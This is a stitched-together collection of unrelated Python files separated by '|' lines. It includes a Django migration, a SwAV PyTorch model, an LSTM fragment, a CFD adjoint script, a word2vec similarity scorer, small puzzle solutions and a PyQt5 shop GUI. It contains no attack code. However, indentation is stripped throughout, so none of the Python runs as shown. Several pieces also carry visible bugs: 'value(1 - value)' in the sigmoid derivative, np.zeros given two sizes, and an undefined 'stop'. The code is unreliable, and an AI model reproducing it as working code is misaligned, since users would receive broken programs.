crearFicheroCasosTest(ficheroVolcadoCasosTest, matrizCasosTest)
|
# Generated by Django 3.0.6 on 2020-06-16 09:02
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('main', '0008_auto_20200616_0901'),
]
operations = [
migrations.AlterField(
model_name='document',
name='pub_date',
field=models.DateTimeField(default=datetime.datetime(2020, 6, 16, 9, 2, 43, 591115, tzinfo=utc), null=True, verbose_name='Date de Publication '),
),
]
|
import numpy as np
import torch
import torch.nn as nn
from cvpods.utils import comm
from torch import distributed as dist
import swav_resnet as resnet_models
class SwAV(nn.Module):
def __init__(self, cfg):
super(SwAV, self).__init__()
self.device = torch.device(cfg.MODEL.DEVICE)
self.D = cfg.MODEL.SWAV.D
self.K = cfg.MODEL.SWAV.K
self.K_start = cfg.MODEL.SWAV.K_START
self.P = cfg.MODEL.SWAV.P
self.T = cfg.MODEL.SWAV.TAU
self.EPS = cfg.MODEL.SWAV.EPS
self.SK_ITERS = cfg.MODEL.SWAV.SK_ITERS
self.improve_numerical_stability = cfg.MODEL.SWAV.NUMERICAL_STABILITY
self.crops_for_assign = cfg.MODEL.SWAV.CROPS_FOR_ASSIGN
self.nmb_crops = cfg.MODEL.SWAV.NMB_CROPS
self.network = resnet_models.__dict__[cfg.MODEL.SWAV.ARCH](
normalize=True,
hidden_mlp=cfg.MODEL.SWAV.HIDDEN_MLP,
output_dim=cfg.MODEL.SWAV.D,
nmb_prototypes=cfg.MODEL.SWAV.P,
)
# create the queue
self.register_buffer(
"queue",
torch.zeros(len(self.crops_for_assign), self.K // comm.get_world_size(), self.D)
)
self.use_the_queue = False
# self.linear_eval = nn.Linear(encoder_dim, 1000)
# self.loss_evaluator = nn.CrossEntropyLoss()
self.softmax = nn.Softmax(dim=1)
self.to(self.device)
def forward(self, batched_inputs):
"""
Input:
im_q: a batch of query images
im_k: a batch of key images
Output:
logits, targets
"""
if self.epoch >= self.K_start:
self.use_the_queue = True
# normalize the prototypes
with torch.no_grad():
w = self.network.prototypes.weight.data.clone()
w = nn.functional.normalize(w, dim=1, p=2)
self.network.prototypes.weight.copy_(w)
# # 0 Linear evaluation
# linear_inputs = [bi['linear'] for bi in batched_inputs]
# x_linear = self.preprocess_image([bi["image"] for bi in linear_inputs]).tensor
# logits = self.linear_eval(
# torch.flatten(self.avgpool(self.network(x_linear)["res5"].detach()), 1)
# )
# labels = torch.tensor([gi["category_id"] for gi in linear_inputs]).cuda()
# linear_loss = self.loss_evaluator(logits, labels)
# acc1, acc5 = accuracy(logits, labels, topk=(1, 5))
# 1. Preprocessing
contrastive_inputs = torch.stack(
[bi['contrastive']["image"] for bi in batched_inputs]
).permute(1, 0, 2, 3, 4).to(self.device)
multiview_inputs = torch.stack(
[bi['multiview']["image"] for bi in batched_inputs]
).permute(1, 0, 2, 3, 4).to(self.device)
inputs = [ci.squeeze(0) for ci in torch.split(contrastive_inputs, 1)] + \
[mi.squeeze(0) for mi in torch.split(multiview_inputs, 1)]
embedding, output = self.network(inputs)
embedding = embedding.detach()
bs = inputs[0].size(0)
# ============ swav loss ... ============
loss = 0
for i, crop_id in enumerate(self.crops_for_assign):
with torch.no_grad():
out = output[bs * crop_id:bs * (crop_id + 1)]
if self.use_the_queue:
out = torch.cat((
torch.mm(self.queue[i], self.network.prototypes.weight.t()),
out,
))
# fill the queue
self.queue[i, bs:] = self.queue[i, :-bs].clone()
self.queue[i, :bs] = embedding[crop_id * bs:(crop_id + 1) * bs]
# get assignments
q = out / self.EPS
if self.improve_numerical_stability:
M = torch.max(q)
dist.all_reduce(M, op=dist.ReduceOp.MAX)
q -= M
q = torch.exp(q).t()
q = distributed_sinkhorn(q, self.SK_ITERS)[-bs:]
# cluster assignment prediction
subloss = 0
for v in np.delete(np.arange(np.sum(self.nmb_crops)), crop_id):
p = self.softmax(output[bs * v:bs * (v + 1)] / self.T)
subloss -= torch.mean(torch.sum(q * torch.log(p), dim=1))
loss += subloss / (np.sum(self.nmb_crops) - 1)
loss /= len(self.crops_for_assign)
self.steps += 1
return {
"loss": loss,
# "loss_linear": linear_loss,
# "acc@1": acc1,
# "acc@5": acc5,
}
def accuracy(output, target, topk=(1, )):
"""Computes the accuracy over the k top predictions for the specified values of k"""
with torch.no_grad():
maxk = max(topk)
batch_size = target.size(0)
_, pred = output.topk(maxk, 1, True, True)
pred = pred.t()
correct = pred.eq(target.view(1, -1).expand_as(pred))
res = []
for k in topk:
correct_k = correct[:k].reshape(-1).float().sum(0, keepdim=True)
res.append(correct_k.mul_(100.0 / batch_size))
return res
def distributed_sinkhorn(Q, nmb_iters):
with torch.no_grad():
Q = shoot_infs(Q)
sum_Q = torch.sum(Q)
dist.all_reduce(sum_Q)
Q /= sum_Q
r = torch.ones(Q.shape[0]).cuda(non_blocking=True) / Q.shape[0]
c = torch.ones(Q.shape[1]).cuda(non_blocking=True) / (comm.get_world_size() * Q.shape[1])
for it in range(nmb_iters):
u = torch.sum(Q, dim=1)
dist.all_reduce(u)
u = r / u
u = shoot_infs(u)
Q *= u.unsqueeze(1)
Q *= (c / torch.sum(Q, dim=0)).unsqueeze(0)
return (Q / torch.sum(Q, dim=0, keepdim=True)).t().float()
def shoot_infs(inp_tensor):
"""Replaces inf by maximum of tensor"""
mask_inf = torch.isinf(inp_tensor)
ind_inf = torch.nonzero(mask_inf, as_tuple=False)
if len(ind_inf) > 0:
for ind in ind_inf:
if len(ind) == 2:
inp_tensor[ind[0], ind[1]] = 0
elif len(ind) == 1:
inp_tensor[ind[0]] = 0
m = torch.max(inp_tensor)
for ind in ind_inf:
if len(ind) == 2:
inp_tensor[ind[0], ind[1]] = m
elif len(ind) == 1:
inp_tensor[ind[0]] = m
return inp_tensor
|
from bruteforce import Bruteforce
from sieve_of_eratosthenes import SieveOfEratosthenes
if __name__=='__main__':
while True:
print("""\nWhich program to run:
1) SieveOfEratosthenes
2) Brute-Force
3) Exit""")
run = input("\nPlease Enter your choice: ")
if run == "1" or run == "SieveOfEratosthenes":
print(*SieveOfEratosthenes(int(input("\nEnter the max number: "))))
elif run == "2" or run == "Bruteforce" or run == "Brute-Force":
print(*Bruteforce(int(input("\nEnter the max number: "))))
elif run == "3" or run == "exit":
break
else:
print("\nError. Please enter 1, 2, or 3")
|
import numpy as np
def sigmoid(x):
return 1.0/(1.0 + np.exp(-x))
def sigmoid_derivative(value):
return value(1 - value)
def tanh_derivative(value):
return 1.- value**2
# create uniform random array w/ values in [a, b] and shape args
def rand_arr(a, b , *args):
# 设置相同的seed时,每次生成的随机数相等
np.random.seed(0)
return np.random.rand(*args) * (b - a) + a
class LstmParam:
def __init__(self, mem_cell_ct, x_dim):
self.mem_cell_ct = mem_cell_ct
self.x_dim = x_dim
concat_len = x_dim + mem_cell_ct
# weight matrix
self.wg = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
self.wi = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
self.wf = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
self.wo = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
# biases term
self.bg = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
self.bf = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
self.bi = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
self.bo = rand_arr(-0.1, 0.1, mem_cell_ct, concat_len)
# diffs (derivatives of loss function w.r.t all parameters)
self.wg_diff = np.zeros(mem_cell_ct, concat_len)
self.wf_diff = np.zeros(mem_cell_ct, concat_len)
self.wi_diff = np.zeros(mem_cell_ct, concat_len)
self.wo_diff = np.zeros(mem_cell_ct, concat_len)
self.bg_diff = np.zeros(mem_cell_ct)
self.bi_diff = np.zeros(mem_cell_ct)
self.bf_diff = np.zeros(mem_cell_ct)
self.bo_diff = np.zeros(mem_cell_ct)
# 更新权重,lr为learning_rate
def apply_diff(self, lr = 1):
self.wg -= lr * self.wg_diff
self.wi -= lr * self.wi_diff
self.wf -= lr * self.wf_diff
self.wo -= lr * self.wo_diff
self.bg -= lr * self.bg_diff
self.bi -= lr * self.bi_diff
self.bf -= lr * self.bf_diff
self.bo -= lr * self.bo_diff
self.wg_diff = np.zeros_like(self.wg)
self.wi_diff = np.zeros_like(self.wi)
self.wf_diff = np.zeros_like(self.wf)
self.wo_diff = np.zeros_like(self.wo)
self.bg_diff = np.zeros_like(self.bg)
self.bi_diff = np.zeros_like(self.bi)
self.bf_diff = np.zeros_like(self.bf)
self.bo_diff = np.zeros_like(self.bo)
class LstmState:
def __init__(self, mem_cell_ct, x_dim):
self.g = np.zeros(mem_cell_ct)
self.i = np.zeros(mem_cell_ct)
self.f = np.zeros(mem_cell_ct)
self.o = np.zeros(mem_cell_ct)
self.s = np.zeros(mem_cell_ct)
self.h = np.zeros(mem_cell_ct)
self.bottom_diff_h = np.zeros_like(self.h)
self.bottom_diff_s = np.zeros_like(self.s)
|
#!/usr/bin/python2
import numpy as np
import os
import shutil
import sys
import h5py
#sys.path.insert(0,'/master/home/nishac/.local/lib/python2.7/site-packages')
sys.path.append("/master/home/nishac/fds/")
sys.path.append("/master/home/nishac/S3/")
#import map_sens
import fds
from adFVM.interface import SerialRunner
from adFVM.mesh import Mesh
class S3(SerialRunner):
def __init__(self, *args, **kwargs):
super(S3, self).__init__(*args, **kwargs)
def __call__(self, initFields, parameter, nSteps, run_id):
case = self.base + 'temp/' + run_id + "/"
print(case)
self.copyCase(case)
data = self.runPrimal(initFields, (parameter, nSteps), case, args='--hdf5')
if run_id=='tempPrimal':
shutil.rmtree(case)
return data
def adjoint(self, initPrimalFields, parameter, nSteps, initAdjointFields, run_id):
case = self.base + 'temp/' + run_id + "/"
self.copyCase(case)
data = self.runAdjoint(initPrimalFields, (parameter, nSteps), initAdjointFields, case, homogeneous=True, args='--hdf5')
return data[0]
def solve_unstable_tangent(runner, tanField, nSteps, time, trjdir):
dt = runner.dt
eps = 1.e-6
parameter = 0.0
primalFieldOrig = runner.readFields(trjdir, time)
tanDir = runner.base + 'temp/' + 'tangent/'
lyap_exp = 0.
if not os.path.exists(tanDir):
os.makedirs(tanDir)
for i in range(nSteps):
primalFieldPert = primalFieldOrig + eps*tanField
primalFieldPert, _ = runner(primalFieldPert, parameter,\
1, 'tempPrimal')
time += dt
primalFieldOrig = runner.readFields(trjdir, time)
tanField = (primalFieldPert - primalFieldOrig)/eps
norm_tan = np.linalg.norm(tanField)
tanField /= norm_tan
lyap_exp += np.log(norm_tan)/(dt*nSteps)
print("time, lyap_exp", time, lyap_exp)
runner.writeFields(tanField, tanDir, time)
return lyap_exp
def solve_unstable_adjoint(runner, adjField, nSteps, initTime,\
finalTime, parameter, case):
dt = runner.dt
primalField = runner.readFields(case, finalTime)
adjDir = runner.base + 'temp/' + 'adjoint'
lyap_exp = 0.
if not os.path.exists(adjDir):
os.makedirs(adjDir)
for i in range(nSteps):
adjField = runner.adjoint(primalField, parameter,\
1, adjField, 'adjoint')
stop
#norm_adj = np.linalg.norm(adjField)
#adjField /= norm_adj
#lyap_exp += np.log(norm_tan)/nSteps
#runner.writeFields(tanField, tanDir, time)
#time += dt
#primalFieldOrig = runner.readFields(case, time)
return lyap_exp
def main():
base = '/master/home/nishac/adFVM/cases/slab_60_fds/'
time = 30.0
dt = 1e-4
template = '/master/home/nishac/adFVM/templates/slab_60_fds.py'
nProcs = 1
runner = S3(base, time, dt, template, nProcs=nProcs, flags=['-g', '--gpu_double'])
#s3sens = map_sens.Sensitivity
nSteps = 6000
nExponents = 1
runUpSteps = 0
parameter = 0.0
checkpointPath = base + 'checkpoint/'
trjdir = base + 'temp/' + 'primal/'
time = 30.0
initField = runner.readFields(base, time)
runId = 'primal'
#outField = runner(initField, parameter, nSteps, runId)
#tanInit = np.ones(initField.shape[0])
#tanInit /= np.linalg.norm(tanInit)
#le = solve_unstable_tangent(runner, tanInit, nSteps, time, trjdir)
#print(le)
initTime = 30.0
finalTime = initTime + dt
adjField = np.random.rand(initField.shape[0])
le = solve_unstable_adjoint(runner, adjField, 1, initTime,\
finalTime, parameter, trjdir)
if __name__ == '__main__':
main()
|
#-*- coding: utf-8 -*-
# coding:utf-8
import jieba
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
import math
import gensim
import numpy as np
def cos_dist(a, b):
if len(a) != len(b):
return None
part_up = 0.0
a_sq = 0.0
b_sq = 0.0
for a1, b1 in zip(a,b):
part_up += a1*b1
a_sq += a1**2
b_sq += b1**2
part_down = math.sqrt(a_sq*b_sq)
if part_down == 0.0:
return None
else:
return part_up / part_down
def process(inpath, outpath):
model = gensim.models.Word2Vec.load('word2vec_wx')
with open(inpath, 'r') as fin, open(outpath, 'w') as fout:
for line in fin:
lineno, sen1, sen2 = line.strip().split('\t')
#print sen1,sen2
wordlist1 = jieba.cut(sen1)
count1 = 0
res_vec1 = np.zeros(256, dtype=np.float32)
for word in wordlist1:
try:
c = model[word]
except KeyError:
print ('not in vocabulary')
c = np.zeros(256, dtype=np.float32)
res_vec1 = res_vec1 + c # 将每一个单词转换成向量model[单词]
count1 += 1 # 计算相加元素的个数
res_vec1= (res_vec1 / count1)
wordlist2 = jieba.cut(sen2)
count2 = 0
res_vec2 = np.zeros(256, dtype=np.float32)
for word in wordlist2:
try:
c = model[word]
except KeyError:
print ('not in vocabulary')
c = np.zeros(256, dtype=np.float32)
res_vec2 = res_vec2 + c # 将每一个单词转换成向量model[单词]
count2 += 1 # 计算相加元素的个数
res_vec2 = (res_vec2 / count2)
r=cos_dist(res_vec1,res_vec2)
if r > 0.8:
fout.write(lineno + '\t1\n')
else:
fout.write(lineno + '\t0\n')
if __name__ == '__main__':
process(sys.argv[1], sys.argv[2])
|
import sys
test_cases = open(sys.argv[1], 'r')
for test in test_cases:
if test:
xua, yua, xla, yla, xub, yub, xlb, ylb = (int(i) for i in test.split(','))
range_x_a = set(xrange(xua, xla + 1))
range_y_a = set(xrange(yla, yua + 1))
range_x_b = set(xrange(xub, xlb + 1))
range_y_b = set(xrange(ylb, yub + 1))
print True if (range_x_a & range_x_b) and (range_y_a & range_y_b) else False
test_cases.close()
|
# prompt: https://www.hackerrank.com/challenges/ctci-ice-cream-parlor/problem
import sys
def solve(arr, money):
costIdxDict = {}
for idx, amt in enumerate(arr):
if money - amt in costIdxDict:
print(costIdxDict[money - amt] + 1, idx + 1)
return
else:
costIdxDict[amt] = idx
if __name__ == "__main__":
t = int(input().strip())
for a0 in range(t):
money = int(input().strip())
n = int(input().strip())
arr = list(map(int, input().strip().split(' ')))
solve(arr, money)
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'mainv3.ui'
#
# Created by: PyQt4 UI code generator 4.11.4
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
import sqlite3
import os
import sys
#this part enables the relative path of the modules for importing
path=os.path.dirname(__file__)
fullpath=os.path.join(path,'BLL')
sys.path.append(fullpath)
sys.path.append('DAL')
from Get_User import GetUserInfo
from mainButtonControl import ButtonControl
try:
_encoding = QtWidgets.QApplication.UnicodeUTF8
def _translate(context, text, disambig):
return QtCore.QCoreApplication.translate(context, text, disambig, _encoding)
except AttributeError:
def _translate(context, text, disambig):
return QtCore.QCoreApplication.translate(context, text, disambig)
class Ui_MainWindow(object):
#the init function is used to send the user and password to this form
def __init__(self, gUser="cheng",gPass="1234"):#TOOOOO EDDIIT
self.obj=GetUserInfo(gUser,gPass)
self.user=self.obj.getUser()
self.UserID=self.user[0][0]
def setupUi(self, MainWindow):
MainWindow.setObjectName("MainWindow")
MainWindow.resize(915, 669)
MainWindow.setEnabled(True) #to enable background in the GUI
self.centralwidget = QtWidgets.QWidget(MainWindow)
self.centralwidget.setObjectName("centralwidget")
self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)
self.gridLayout.setObjectName("gridLayout")
self.label_stock = QtWidgets.QLabel(self.centralwidget)
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(16)
self.label_stock.setFont(font)
self.label_stock.setAlignment(QtCore.Qt.AlignCenter)
self.label_stock.setObjectName("label_stock")
self.gridLayout.addWidget(self.label_stock, 0, 3, 1, 2)
self.btn_Great = QtWidgets.QPushButton(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_Great.sizePolicy().hasHeightForWidth())
self.btn_Great.setSizePolicy(sizePolicy)
self.btn_Great.setObjectName("btn_Great")
self.gridLayout.addWidget(self.btn_Great, 4, 2, 1, 1)
self.btn_Reset = QtWidgets.QPushButton(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_Reset.sizePolicy().hasHeightForWidth())
self.btn_Reset.setSizePolicy(sizePolicy)
self.btn_Reset.setObjectName("btn_Reset")
self.gridLayout.addWidget(self.btn_Reset, 5, 0, 1, 2)
self.btn_Load = QtWidgets.QPushButton(self.centralwidget)
self.btn_Load.setObjectName("btn_Load")
self.gridLayout.addWidget(self.btn_Load, 5, 3, 1, 2)
self.tableWidget_Cart = QtWidgets.QTableWidget(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Expanding)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tableWidget_Cart.sizePolicy().hasHeightForWidth())
self.tableWidget_Cart.setSizePolicy(sizePolicy)
self.tableWidget_Cart.setObjectName("tableWidget_Cart")
self.tableWidget_Cart.setColumnCount(3)
self.tableWidget_Cart.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_Cart.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_Cart.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_Cart.setHorizontalHeaderItem(2, item)
self.tableWidget_Cart.horizontalHeader().setMinimumSectionSize(49)
self.gridLayout.addWidget(self.tableWidget_Cart, 3, 0, 2, 2)
self.label_Total = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_Total.sizePolicy().hasHeightForWidth())
self.label_Total.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(16)
self.label_Total.setFont(font)
self.label_Total.setAlignment(QtCore.Qt.AlignCenter)
self.label_Total.setObjectName("label_Total")
self.gridLayout.addWidget(self.label_Total, 6, 0, 1, 3)
self.lineEdit_Search = QtWidgets.QLineEdit(self.centralwidget)
self.lineEdit_Search.setObjectName("lineEdit_Search")
self.gridLayout.addWidget(self.lineEdit_Search, 2, 3, 1, 1)
self.btn_Search = QtWidgets.QPushButton(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_Search.sizePolicy().hasHeightForWidth())
self.btn_Search.setSizePolicy(sizePolicy)
self.btn_Search.setObjectName("btn_Search")
self.gridLayout.addWidget(self.btn_Search, 2, 4, 1, 1)
self.btn_Less = QtWidgets.QPushButton(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Fixed, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_Less.sizePolicy().hasHeightForWidth())
self.btn_Less.setSizePolicy(sizePolicy)
self.btn_Less.setObjectName("btn_Less")
self.gridLayout.addWidget(self.btn_Less, 3, 2, 1, 1)
self.btn_Purchase = QtWidgets.QPushButton(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.btn_Purchase.sizePolicy().hasHeightForWidth())
self.btn_Purchase.setSizePolicy(sizePolicy)
self.btn_Purchase.setObjectName("btn_Purchase")
self.gridLayout.addWidget(self.btn_Purchase, 7, 1, 1, 1)
self.tableWidget_Stock = QtWidgets.QTableWidget(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.tableWidget_Stock.sizePolicy().hasHeightForWidth())
self.tableWidget_Stock.setSizePolicy(sizePolicy)
self.tableWidget_Stock.setObjectName("tableWidget_Stock")
self.tableWidget_Stock.setColumnCount(3)
self.tableWidget_Stock.setRowCount(0)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_Stock.setHorizontalHeaderItem(0, item)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_Stock.setHorizontalHeaderItem(1, item)
item = QtWidgets.QTableWidgetItem()
self.tableWidget_Stock.setHorizontalHeaderItem(2, item)
self.tableWidget_Stock.horizontalHeader().setMinimumSectionSize(49)
self.gridLayout.addWidget(self.tableWidget_Stock, 3, 3, 2, 2)
self.label_4 = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_4.sizePolicy().hasHeightForWidth())
self.label_4.setSizePolicy(sizePolicy)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 2, 0, 1, 1)
self.label_cart = QtWidgets.QLabel(self.centralwidget)
sizePolicy = QtWidgets.QSizePolicy(QtWidgets.QSizePolicy.Preferred, QtWidgets.QSizePolicy.Fixed)
sizePolicy.setHorizontalStretch(0)
sizePolicy.setVerticalStretch(0)
sizePolicy.setHeightForWidth(self.label_cart.sizePolicy().hasHeightForWidth())
self.label_cart.setSizePolicy(sizePolicy)
font = QtGui.QFont()
font.setFamily("Arial")
font.setPointSize(16)
self.label_cart.setFont(font)
self.label_cart.setAlignment(QtCore.Qt.AlignCenter)
self.label_cart.setObjectName("label_cart")
self.gridLayout.addWidget(self.label_cart, 0, 0, 1, 2)
self.lineEdit_Search.raise_()
self.btn_Search.raise_()
self.btn_Great.raise_()
self.btn_Reset.raise_()
self.btn_Load.raise_()
self.label_stock.raise_()
self.tableWidget_Cart.raise_()
self.label_cart.raise_()
self.tableWidget_Stock.raise_()
self.label_Total.raise_()
self.btn_Purchase.raise_()
self.label_4.raise_()
self.btn_Less.raise_()
MainWindow.setCentralWidget(self.centralwidget)
self.menubar = QtWidgets.QMenuBar(MainWindow)
self.menubar.setGeometry(QtCore.QRect(0, 0, 915, 26))
self.menubar.setObjectName("menubar")
self.menuUser = QtWidgets.QMenu(self.menubar)
self.menuUser.setObjectName("menuUser")
self.menuHelp = QtWidgets.QMenu(self.menubar)
self.menuHelp.setObjectName("menuHelp")
MainWindow.setMenuBar(self.menubar)
self.statusbar = QtWidgets.QStatusBar(MainWindow)
self.statusbar.setObjectName("statusbar")
MainWindow.setStatusBar(self.statusbar)
self.actionAbout = QtWidgets.QAction(MainWindow)
self.actionAbout.setObjectName("actionAbout")
self.actionHelp = QtWidgets.QAction(MainWindow)
self.actionHelp.setObjectName("actionHelp")
self.actionAccount_info = QtWidgets.QAction(MainWindow)
self.actionAccount_info.setObjectName("actionAccount_info")
self.menuUser.addAction(self.actionAccount_info)
self.menuHelp.addAction(self.actionAbout)
self.menuHelp.addAction(self.actionHelp)
self.menubar.addAction(self.menuUser.menuAction())
self.menubar.addAction(self.menuHelp.menuAction())
self.retranslateUi(MainWindow)
QtCore.QMetaObject.connectSlotsByName(MainWindow)
#####
MainWindow.setStyleSheet("#MainWindow { border-image: url(Flower_main2.jpg) 0 0 0 0 stretch stretch; }")
self.tableWidget_Cart.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
self.tableWidget_Stock.setEditTriggers(QtWidgets.QAbstractItemView.NoEditTriggers)
header = self.tableWidget_Stock.horizontalHeader()
header.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)
header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(2, QtWidgets.QHeaderView.ResizeToContents)
header = self.tableWidget_Cart.horizontalHeader()
header.setSectionResizeMode(0, QtWidgets.QHeaderView.Stretch)
header.setSectionResizeMode(1, QtWidgets.QHeaderView.ResizeToContents)
header.setSectionResizeMode(2, QtWidgets.QHeaderView.ResizeToContents)
self.btn_Load.clicked.connect(self.btn_load_clicked)
self.btn_Less.clicked.connect(self.btn_lessthan_clicked)
self.btn_Reset.clicked.connect(self.btn_reset_clicked)
self.btn_Great.clicked.connect(self.btn_greaterthan_clicked)
self.btn_Purchase.clicked.connect(self.btn_purchase_clicked)
self.actionAccount_info.triggered.connect(self.account_info_clicked)
self.actionAbout.triggered.connect(self.About_clicked)
self.actionHelp.triggered.connect(self.Help_clicked)
self.btn_Search.clicked.connect(self.btn_search_clicked)
def btn_load_clicked(self):# this part loads the database into the stock table
result, connection, cursor=ButtonControl.loadData()
self.tableWidget_Stock.setRowCount(0)
for row_number, row_data in enumerate(result): #iteration for inputting the database into the table
self.tableWidget_Stock.insertRow(row_number)
for column_number, data in enumerate(row_data):
self.tableWidget_Stock.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
cursor.close()
connection.close()
def btn_search_clicked(self):
result, connection, cursor=ButtonControl.searchButton(self.lineEdit_Search.text())
self.tableWidget_Stock.setRowCount(0)
for row_number, row_data in enumerate(result):
self.tableWidget_Stock.insertRow(row_number)
for column_number, data in enumerate(row_data):
self.tableWidget_Stock.setItem(row_number, column_number, QtWidgets.QTableWidgetItem(str(data)))
cursor.close()
connection.close()
# the next three methods are for the menubar
def Help_clicked(self):
ButtonControl.helpButton()
def About_clicked(self):
ButtonControl.aboutButton()
def account_info_clicked(self):
self.obj.accountInfo()
def btn_lessthan_clicked(self):
self.rowPosition = self.tableWidget_Cart.rowCount() #gives rowPos the current rowcount
self.selectedRow=self.tableWidget_Stock.currentRow() #gives selectedrow the currently clicked row's index
col1=self.tableWidget_Stock.item(self.selectedRow,0) #selects the item at the current row, and column
col2=self.tableWidget_Stock.item(self.selectedRow,1)
col3=self.tableWidget_Stock.item(self.selectedRow,2)
#update the price and quantity if the item is already in the cart
dup=False
rowCtr=0
while rowCtr!=self.tableWidget_Cart.rowCount():
if self.tableWidget_Cart.item(rowCtr,0).text()==self.tableWidget_Stock.item(self.selectedRow,0).text():
dup=True
quantity=int(self.tableWidget_Cart.item(rowCtr,1).text())
if quantity ==int(self.tableWidget_Stock.item(self.selectedRow,1).text()):
ButtonControl.lessThanError(0) #error when the user is getting more item than available
else:
self.tableWidget_Cart.setItem(rowCtr , 1, QtWidgets.QTableWidgetItem(str(quantity+1)))
self.itemPrice=float(col3.text())
newPrice=self.itemPrice*(quantity+1)
self.tableWidget_Cart.setItem(rowCtr , 2, QtWidgets.QTableWidgetItem(str(newPrice)))
break
rowCtr+=1
#insert a new row if the item is not yet in the cart
if dup==False:
if int(self.tableWidget_Stock.item(self.selectedRow,1).text())==0:
ButtonControl.lessThanError(1)
else:
self.tableWidget_Cart.insertRow(self.rowPosition) #insert a new row
self.tableWidget_Cart.setItem(self.rowPosition , 0, QtWidgets.QTableWidgetItem(col1.text())) #insert item at the current row and col
self.tableWidget_Cart.setItem(self.rowPosition , 1, QtWidgets.QTableWidgetItem("1"))
self.tableWidget_Cart.setItem(self.rowPosition , 2, QtWidgets.QTableWidgetItem(col3.text()))
self.UpdatePrice()
def btn_greaterthan_clicked(self): #return item from the cart to the stock table
if self.tableWidget_Cart.item(self.tableWidget_Cart.currentRow(),1)==None:
return
else:
if int(self.tableWidget_Cart.item(self.tableWidget_Cart.currentRow(),1).text())>1:
quantity=int(self.tableWidget_Cart.item(self.tableWidget_Cart.currentRow(),1).text())-1
self.tableWidget_Cart.setItem(self.tableWidget_Cart.currentRow() , 1, QtWidgets.QTableWidgetItem(str(quantity)))
newPrice=(float(self.tableWidget_Cart.item(self.tableWidget_Cart.currentRow(),2).text()))/(quantity+1)
newPrice=newPrice*quantity
self.tableWidget_Cart.setItem(self.tableWidget_Cart.currentRow() , 2, QtWidgets.QTableWidgetItem(str(newPrice)))
else:
self.tableWidget_Cart.removeRow(self.tableWidget_Cart.currentRow())
self.UpdatePrice()
def btn_reset_clicked(self): #empty the cart table
self.tableWidget_Cart.setRowCount(0)
self.label_Total.setText("Total amount in cart:0.0")
def btn_purchase_clicked(self): #this updates the database, reloads the stock table, and resets the cart table.
if self.tableWidget_Cart.rowCount()==0:
ButtonControl.checkCart(True,0,0,0)
else:
rowCount=0
itemID=""
while rowCount<self.tableWidget_Cart.rowCount():
itemID=itemID+ButtonControl.itemID(self.tableWidget_Cart.item(rowCount,0).text(),self.tableWidget_Cart.item(rowCount,1).text())
rowCount=rowCount+1
calcel=False
cancel=ButtonControl.checkCart(False,self.price,self.UserID,itemID)
if cancel==False:
self.btn_load_clicked()
self.btn_reset_clicked()
